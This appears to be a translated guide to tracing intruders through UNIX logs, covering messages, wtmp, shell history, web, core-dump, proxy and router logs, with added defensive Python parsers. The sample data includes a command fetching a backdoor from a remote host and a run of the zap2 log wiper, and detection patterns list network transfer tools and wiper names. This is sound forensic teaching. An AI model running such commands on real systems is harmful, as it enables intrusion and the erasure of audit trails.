1. Messages
/var/adm is the log directory on traditional UNIX (/var/log on Linux). There are quite a few ASCII-formatted log files there, but let us focus first on the messages file, which is generally the file of most interest to intruders: it records system-level information such as the copyright and hardware messages printed at boot, failed logins, and sessions being opened. The following is a failed-login record:

APR 19:06:47 www login[28845]: FAILED login 1 from xxx.xxx.xxx.xxx, User not known to the underlying authentication module

and this one records a session being opened for the user ncx (that is, a successful login) by uid 0:

APR 22:05:45 game pam_pwdb[29509]: (login) session opened for user ncx by (uid=0)
The first step should be to run kill -HUP `cat /var/run/syslogd.pid`, so that syslogd reopens its log files and flushes anything still buffered to disk; of course, the intruder may already have done this themselves.
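As an added example (not part of the original article), the following Python script parses messages lines in the classic BSD syslog layout and pulls out exactly the two kinds of record quoted above, failed logins and opened sessions, plus sshd's "Accepted" lines, so that failed attempts from an address can be matched against the successful login that followed them. The sample lines are constructed here and modelled on the quoted records; the addresses, the day of month and the sshd line are assumptions.

```python
import re
from collections import Counter

# Constructed sample lines modelled on the two records quoted above; they are
# not real log data. Addresses, the day-of-month and the sshd line are assumed.
SAMPLE_MESSAGES = """\
Apr 28 19:06:47 www login[28845]: FAILED LOGIN 1 FROM 10.1.2.3 FOR root, User not known to the underlying authentication module
Apr 28 19:06:51 www login[28845]: FAILED LOGIN 2 FROM 10.1.2.3 FOR root, Authentication failure
Apr 28 22:05:45 game pam_pwdb[29509]: (login) session opened for user ncx by (uid=0)
Apr 28 22:06:02 game sshd[29530]: Accepted password for ncx from 10.1.2.3 port 40112 ssh2
Apr 28 23:10:00 game kernel: eth0: link up
"""

# Classic BSD syslog line: "Mon dd hh:mm:ss host prog[pid]: message"
SYSLOG_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} [ \d]\d \d\d:\d\d:\d\d) "
    r"(?P<host>\S+) "
    r"(?P<prog>[^\[:]+)(?:\[(?P<pid>\d+)\])?: "
    r"(?P<msg>.*)$")

# Message bodies worth pulling out in a post-intrusion review.
FAILED_RE = re.compile(r"FAILED LOGIN (?P<count>\d+) FROM (?P<src>\S+)", re.I)
SESSION_RE = re.compile(r"session opened for user (?P<user>\S+) by \(uid=(?P<uid>\d+)\)")
ACCEPTED_RE = re.compile(r"Accepted \S+ for (?P<user>\S+) from (?P<src>\S+)")


def parse_messages(text):
    """Parse syslog lines into dicts and classify the login-related ones."""
    events = []
    for line in text.splitlines():
        m = SYSLOG_RE.match(line)
        if not m:
            continue  # not a syslog-format line (e.g. continuation of a kernel dump)
        ev = m.groupdict()
        ev["kind"] = "other"
        body = ev["msg"]
        f = FAILED_RE.search(body)
        s = SESSION_RE.search(body)
        a = ACCEPTED_RE.search(body)
        if f:
            ev.update(kind="failed_login", src=f["src"], attempt=int(f["count"]))
        elif s:
            ev.update(kind="session_opened", user=s["user"], uid=int(s["uid"]))
        elif a:
            ev.update(kind="accepted_login", user=a["user"], src=a["src"])
        events.append(ev)
    return events


def failed_login_sources(events):
    """Count failed logins per source address."""
    return Counter(e["src"] for e in events if e["kind"] == "failed_login")


def opened_sessions(events):
    """(host, user, uid) for every session that PAM reports as opened."""
    return [(e["host"], e["user"], e["uid"])
            for e in events if e["kind"] == "session_opened"]


def logins_from(events, src):
    """Successful logins from one source: the thing to check after its failures."""
    return [(e["ts"], e["host"], e["user"]) for e in events
            if e["kind"] == "accepted_login" and e["src"] == src]


if __name__ == "__main__":
    evs = parse_messages(SAMPLE_MESSAGES)
    for src, n in failed_login_sources(evs).items():
        print(f"{src}: {n} failed login(s), then {logins_from(evs, src)}")
    print("sessions opened:", opened_sessions(evs))
```

To run it over a real file, pass the contents of /var/log/messages (or /var/adm/messages) to parse_messages; note that this syslog layout carries no year, so the timestamps must be interpreted relative to the file's modification time.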
2. wtmp, utmp and ftp logs
In /var/adm, /var/log or /etc you will find the files wtmp and utmp, which record when and from where each user logged on to the host. One of the oldest and most popular tools in the hacker toolkit is zap2 (the compiled binary is usually called z2, or wipe), which "erases" a user's login entries from these two files; however, out of laziness or because of a slow link, many intruders never upload or compile it. The administrator can use the last command (which reads wtmp) or lastlog to obtain the source address of the intruder's most recent connection (which, of course, may only be a springboard host). The FTP log is normally /var/log/xferlog, and it records in detail the time, source, filename and so on of every file transferred over ftp; but because that log is so conspicuous, slightly more sophisticated intruders almost never use ftp to move files and generally use rcp instead.
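Added example, not from the original article: a Python parser for wtmp/utmp records that also looks for the footprint zap2 leaves behind. It assumes the glibc utmp layout on 32- or 64-bit Linux x86 (384-byte little-endian records); other UNIX variants use a different utmpx structure, so the format string must be adjusted there. The sample wtmp image is constructed inline, with one record overwritten by zeros to stand in for a wiped login.

```python
import struct
import time

# glibc's struct utmp on Linux x86 (little-endian, 384 bytes per record).
# Field order: ut_type, ut_pid, ut_line, ut_id, ut_user, ut_host,
# ut_exit (2 shorts), ut_session, ut_tv (sec, usec), ut_addr_v6[4], padding.
UTMP_FMT = "<hxxi32s4s32s256shhiii4i20x"
UTMP_SIZE = struct.calcsize(UTMP_FMT)

EMPTY, BOOT_TIME, LOGIN_PROCESS, USER_PROCESS, DEAD_PROCESS = 0, 2, 6, 7, 8


def _cstr(b):
    return b.split(b"\0", 1)[0].decode("latin-1")


def pack_record(ut_type, pid, line, user, host, tv_sec):
    """Build one utmp record (used here only to construct sample data)."""
    return struct.pack(UTMP_FMT, ut_type, pid, line.encode(), b"", user.encode(),
                       host.encode(), 0, 0, 0, tv_sec, 0, 0, 0, 0, 0)


def parse_wtmp(data):
    """Split a wtmp/utmp image into records; flags records that are all zero bytes."""
    if len(data) % UTMP_SIZE:
        raise ValueError("file size is not a multiple of the utmp record size")
    records = []
    for off in range(0, len(data), UTMP_SIZE):
        raw = data[off:off + UTMP_SIZE]
        f = struct.unpack(UTMP_FMT, raw)
        records.append({
            "index": off // UTMP_SIZE,
            "type": f[0], "pid": f[1],
            "line": _cstr(f[2]), "user": _cstr(f[4]), "host": _cstr(f[5]),
            "time": f[9],
            "zeroed": raw == b"\0" * UTMP_SIZE,
        })
    return records


def wiped_records(records):
    """Indices of all-zero records. wtmp is only ever appended to, so a block of
    zeros in the middle of it is the footprint of a zap2/z2-style wiper, which
    overwrites the victim's entry in place rather than removing it."""
    return [r["index"] for r in records if r["zeroed"]]


def sessions(records):
    """Pair each USER_PROCESS with the next DEAD_PROCESS on the same line, the
    way last(1) does. Returns (user, host, login_time, logout_time_or_None)."""
    open_by_line, out = {}, []
    for r in records:
        if r["type"] == USER_PROCESS:
            open_by_line[r["line"]] = r
        elif r["type"] == DEAD_PROCESS and r["line"] in open_by_line:
            start = open_by_line.pop(r["line"])
            out.append((start["user"], start["host"], start["time"], r["time"]))
    for start in open_by_line.values():          # still logged in
        out.append((start["user"], start["host"], start["time"], None))
    return out


# Constructed sample wtmp: a reboot, a local root login, an entry overwritten
# with zeros by a wiper, and a remote login as ncx that the intruder left alone.
T0 = 956973600  # arbitrary epoch timestamp for the sample (assumed)
SAMPLE_WTMP = b"".join([
    pack_record(BOOT_TIME, 0, "~", "reboot", "2.2.14", T0),
    pack_record(USER_PROCESS, 1201, "tty1", "root", "", T0 + 60),
    b"\0" * UTMP_SIZE,
    pack_record(USER_PROCESS, 29509, "pts/1", "ncx", "10.1.2.3", T0 + 9300),
    pack_record(DEAD_PROCESS, 29509, "pts/1", "", "", T0 + 9900),
])


def _fmt(t):
    return time.strftime("%b %d %H:%M", time.gmtime(t)) if t else "still logged in"


if __name__ == "__main__":
    recs = parse_wtmp(SAMPLE_WTMP)
    print("wiped entries at record index:", wiped_records(recs))
    for user, host, t_in, t_out in sessions(recs):
        print(f"{user:8} {host or 'local':16} {_fmt(t_in)} - {_fmt(t_out)}")
```

On a real system, feed it the bytes of /var/log/wtmp; a zeroed record between two genuine ones is worth far more attention than the absence of an intruder's login, since absence could also mean they never logged in interactively.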
3. .sh_history
With root permission an intruder can create their own account, and the more advanced technique is to set a password on a rarely used system account such as uucp or lp. After the intrusion, even if the intruder deletes files such as .sh_history or .bash_history, the command history of any shell that is still running is held in memory and only written to disk when that shell exits; sending those shells a SIGHUP (kill -HUP <pid>) makes them exit and write the remaining history back to disk. Then run find / -name .sh_history -print and carefully review every suspicious shell command log. You can find .sh_history in /usr/spool/lp (lp's home directory) and /usr/lib/uucp/, and you may well find commands such as ftp xxx.xxx.xxx.xxx or rcp nobody@xxx.xxx.xxx.xxx:/tmp/backdoor /tmp/backdoor, which reveal the intruder's IP address or domain name.
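Added example (not the article's own code): a Python script that does what the find command above does, then reads each history file it finds and reports the ftp/rcp-style commands together with the remote host they name, plus any invocation of the wiper binaries named in section 2. The directory tree it scans is constructed in a temporary directory; the paths, addresses and commands in it are assumed, and the host-extraction regex is a triage heuristic rather than a full shell parser.

```python
import os
import re
import tempfile

HISTORY_NAMES = {".sh_history", ".bash_history", ".history"}

# Commands that reach another host; the operand tells us which one.
TRANSFER_RE = re.compile(r"(?:^|\s)(?P<cmd>ftp|rcp|scp|rsh|telnet)\s+(?P<args>.+)")
# user@host, host:path or a bare address/name after a transfer command.
HOST_RE = re.compile(
    r"(?:[\w.-]+@)?(?P<host>(?:\d{1,3}\.){3}\d{1,3}|[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+)")
# Names the article gives for the wtmp/utmp wiper.
WIPER_RE = re.compile(r"(?:^|[\s/])(?P<tool>z2|zap2?|wipe)\b")


def find_history_files(root):
    """Every shell history file under root, wherever the owner's home is."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        hits.extend(os.path.join(dirpath, n) for n in files if n in HISTORY_NAMES)
    return sorted(hits)


def scan_history(root):
    """History lines that moved files to/from a remote host or ran a wiper."""
    findings = []
    for path in find_history_files(root):
        rel = os.path.relpath(path, root)
        with open(path, errors="replace") as fh:
            for lineno, line in enumerate(fh, 1):
                t = TRANSFER_RE.search(line)
                w = WIPER_RE.search(line)
                if t:
                    h = HOST_RE.search(t["args"])
                    findings.append({"file": rel, "line": lineno, "cmd": t["cmd"],
                                     "host": h["host"] if h else None,
                                     "text": line.rstrip()})
                elif w:
                    findings.append({"file": rel, "line": lineno, "cmd": w["tool"],
                                     "host": None, "text": line.rstrip()})
    return findings


def build_sample_tree(root):
    """Constructed histories in the lp and uucp homes named above plus a clean user."""
    samples = {
        "usr/spool/lp/.sh_history": "ls -la\nftp 10.1.2.3\ncd /tmp\n./z2 lp\n",
        "usr/lib/uucp/.sh_history":
            "rcp nobody@10.1.2.3:/tmp/backdoor /tmp/backdoor\nchmod 755 /tmp/backdoor\n",
        "home/alice/.bash_history": "vi report.txt\nmake\n",
    }
    for rel, content in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(content)


def demo():
    """Run the scan over a temporary copy of the sample tree."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        files = [os.path.relpath(p, root) for p in find_history_files(root)]
        return scan_history(root), files


if __name__ == "__main__":
    findings, files = demo()
    print("history files:", files)
    for f in findings:
        print(f"{f['file']}:{f['line']}: {f['cmd']} -> {f['host'] or '-'}  ({f['text']})")
```

Against a live system call scan_history("/") as root; the interesting output is a transfer command in a system account's history (lp, uucp) or a wiper run anywhere at all.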
4. HTTP Server log
This is the most effective way to determine where the intruder's attack really came from. Taking the most popular server, Apache, as an example, in the logs/ directory under the server root you will find the file access.log, which records each visitor's IP address, access time and the content requested. After an intrusion we can usually find records like the following in this file:

xxx.xxx.xxx.xxx - - [28/Apr/2000:00:29:05 -0800] "GET /cgi-bin/rguest.exe" 404 -
xxx.xxx.xxx.xxx - - [28/Apr/2000:00:28:57 -0800] "GET /msads/samples/selector/showcode.asp" 404 -

This shows that an intruder at IP xxx.xxx.xxx.xxx tried to fetch /msads/samples/selector/showcode.asp at 00:28 on 28 April 2000; such lines are the traces left behind by a web CGI scanner. Most intruders who run web scanners choose the servers nearest to them, so combining the time of the attack with the IP address tells us a good deal about the intruder.
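The access.log analysis described above, as an added Python example that is not part of the original article. It parses Apache's common log format, groups requests by client, and flags clients that hit known CGI-scanner probe paths or that mostly collect 404s in a short burst. The sample log is constructed and the addresses are assumed; the probe list combines the two paths quoted in the article with two other well-known probes of the period (phf and test-cgi), and is meant to be extended.

```python
import re
from datetime import datetime

# Apache common log format: host ident authuser [time] "request" status bytes
CLF_RE = re.compile(
    r'^(?P<host>\S+) (?P<ident>\S+) (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)')

# Paths probed by CGI scanners of the period: the two from the article plus
# two other classic probes. Extend this set with whatever your scanners hit.
SCANNER_PATHS = {
    "/cgi-bin/rguest.exe",
    "/msads/samples/selector/showcode.asp",
    "/cgi-bin/phf",
    "/cgi-bin/test-cgi",
}

# Constructed sample log: one scanner run and one ordinary visitor (assumed).
SAMPLE_ACCESS_LOG = """\
10.1.2.3 - - [28/Apr/2000:00:28:57 -0800] "GET /msads/samples/selector/showcode.asp HTTP/1.0" 404 -
10.1.2.3 - - [28/Apr/2000:00:28:58 -0800] "GET /cgi-bin/phf?Qalias=x HTTP/1.0" 404 -
10.1.2.3 - - [28/Apr/2000:00:29:05 -0800] "GET /cgi-bin/rguest.exe HTTP/1.0" 404 -
10.1.2.3 - - [28/Apr/2000:00:29:07 -0800] "GET /cgi-bin/test-cgi HTTP/1.0" 404 -
192.0.2.50 - - [28/Apr/2000:00:30:11 -0800] "GET /index.html HTTP/1.0" 200 2345
192.0.2.50 - - [28/Apr/2000:00:30:12 -0800] "GET /images/logo.gif HTTP/1.0" 200 1200
"""


def parse_access_log(text):
    """One dict per parseable line; the query string is dropped from the path."""
    entries = []
    for line in text.splitlines():
        m = CLF_RE.match(line)
        if not m:
            continue
        parts = m["request"].split()
        path = parts[1] if len(parts) > 1 else ""
        entries.append({
            "host": m["host"],
            "time": datetime.strptime(m["time"], "%d/%b/%Y:%H:%M:%S %z"),
            "method": parts[0] if parts else "",
            "path": path.split("?", 1)[0].lower(),
            "status": int(m["status"]),
        })
    return entries


def summarize_by_source(entries):
    """Per-client counters: requests, 404s, scanner-signature hits, time span."""
    summary = {}
    for e in sorted(entries, key=lambda e: e["time"]):
        s = summary.setdefault(e["host"], {
            "requests": 0, "not_found": 0, "signature_hits": 0,
            "first": e["time"], "last": e["time"], "paths": []})
        s["requests"] += 1
        s["not_found"] += int(e["status"] == 404)
        s["signature_hits"] += int(e["path"] in SCANNER_PATHS)
        s["last"] = e["time"]
        s["paths"].append(e["path"])
    for s in summary.values():
        s["span_seconds"] = int((s["last"] - s["first"]).total_seconds())
    return summary


def flag_scanners(summary, min_requests=3, min_404_ratio=0.5):
    """Clients that hit a known probe path, or that mostly collect 404s."""
    flagged = []
    for host, s in summary.items():
        burst_of_404s = (s["requests"] >= min_requests
                         and s["not_found"] / s["requests"] >= min_404_ratio)
        if s["signature_hits"] or burst_of_404s:
            flagged.append(host)
    return sorted(flagged)


if __name__ == "__main__":
    summary = summarize_by_source(parse_access_log(SAMPLE_ACCESS_LOG))
    for host in flag_scanners(summary):
        s = summary[host]
        print(f"{host}: {s['requests']} requests, {s['not_found']} x 404, "
              f"{s['signature_hits']} known probes in {s['span_seconds']}s, "
              f"first seen {s['first']:%d/%b/%Y %H:%M:%S}")
```

The 404 burst rule catches scanners whose probe list is not in SCANNER_PATHS; the first-seen timestamp is the one to line up with the login records from sections 1 and 2.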
5. Core Dump
A secure and stable daemon does not dump core while running. When an intruder exploits a remote vulnerability, however, the service often crashes and leaves a core file, and since many services have just executed the getpeername() socket call on the attacker's connection, the intruder's IP address is still stored in that memory image.
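Added example, not from the original article: a Python script that applies the observation above by scanning a raw memory image for byte runs shaped like a filled-in struct sockaddr_in, which is what getpeername() fills in for the remote end of a connection. It assumes the Linux/x86 layout (family in host byte order, then port and address in network order, then eight zero bytes); a sample "core" buffer is constructed inline. This is a triage heuristic for getting candidate addresses out of a core file; gdb on the core with the daemon's symbols is the precise tool.

```python
import socket
import struct

# struct sockaddr_in on Linux/x86: sa_family (uint16, host order, AF_INET=2),
# sin_port (uint16, network order), sin_addr (4 bytes), sin_zero[8].
SOCKADDR_IN_LEN = 16
AF_INET = 2


def find_sockaddr_in(buf, little_endian=True):
    """(offset, ip, port) for every byte run that looks like a filled-in
    sockaddr_in. Zero ports, zero addresses and non-zero sin_zero are
    rejected to cut down on random matches in a large image."""
    fam = struct.pack("<H" if little_endian else ">H", AF_INET)
    hits, start = [], 0
    while True:
        off = buf.find(fam, start)
        if off < 0 or off + SOCKADDR_IN_LEN > len(buf):
            break
        start = off + 1
        port = struct.unpack("!H", buf[off + 2:off + 4])[0]
        addr = buf[off + 4:off + 8]
        if port == 0 or addr == b"\0\0\0\0" or buf[off + 8:off + 16] != b"\0" * 8:
            continue
        hits.append((off, socket.inet_ntoa(addr), port))
    return hits


def likely_peers(hits):
    """Drop loopback entries, which are the server's own bound sockets."""
    return [(ip, port) for _off, ip, port in hits if not ip.startswith("127.")]


def make_sockaddr_in(ip, port):
    """Pack a sockaddr_in the way the kernel lays it out (used for sample data)."""
    return (struct.pack("<H", AF_INET) + struct.pack("!H", port)
            + socket.inet_aton(ip) + b"\0" * 8)


# Constructed "core" image (assumed content): a fake ELF header, some text,
# the peer address left behind by getpeername(), the daemon's own bound
# address, a zeroed struct, and a false positive with garbage in sin_zero.
SAMPLE_CORE = (
    b"\x7fELF" + b"\0" * 60
    + b"Connection from client\0"
    + make_sockaddr_in("10.1.2.3", 3127)
    + make_sockaddr_in("127.0.0.1", 80)
    + b"\0" * SOCKADDR_IN_LEN
    + b"\x02\x00\x12\x34\x0a\x00\x00\x01" + b"ABCDEFGH"
    + b"\0" * 32
)

if __name__ == "__main__":
    hits = find_sockaddr_in(SAMPLE_CORE)
    for off, ip, port in hits:
        print(f"0x{off:06x}: {ip}:{port}")
    print("peer candidates:", likely_peers(hits))
```

For a real core pass open("core", "rb").read() instead of SAMPLE_CORE, and set little_endian=False on a big-endian host such as SPARC; expect some false positives in a multi-megabyte image, which is why the loopback filter and the sin_zero check are there.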
6. Proxy Server Log
A proxy server is what large and medium-sized enterprise networks commonly use as the gateway between internal and external traffic, and it faithfully records every user's accesses, including those of an intruder. Taking the most common proxy, squid, as an example, you can usually find the huge access.log file under /usr/local/squid/logs/. Squid's log analysis scripts are available at http://www.squid-cache.org/Doc/Users-Guide/added/st.HTML; by analysing the access records for sensitive files you can learn when, and by whom, content that was supposed to be confidential was visited.
7. Router Log
By default, routers do not log scans or logins, so intruders often use them as springboards for attacks. If your corporate network is divided into a protected zone and a demilitarized zone, enabling logging on the router will help track intruders later. More importantly, for the administrator such a setting makes it possible to tell whether the attacker is an inside thief or an outside robber. Of course, you need an additional server to receive and store the router's log file.
Attention!
In the course of carrying out an attack it is impossible for an intruder never to establish a TCP connection with the target; there are many subjective and objective reasons for this, and it is quite difficult for the intruder to keep the attack entirely out of the logs.
If we spend enough time and energy, we can piece together the intruder's information from the many logs. As for the intruder's behaviour: the more privileges they gain on the target, the more cautious they tend to be about how they connect to it. Careful analysis of the early logs, especially those that contain the scans, therefore yields much more.
Log auditing is only a passive means of defence against intrusion; the initiative lies in strengthening your own knowledge and upgrading or patching the system in time. Preparedness is the most effective way to prevent intrusion.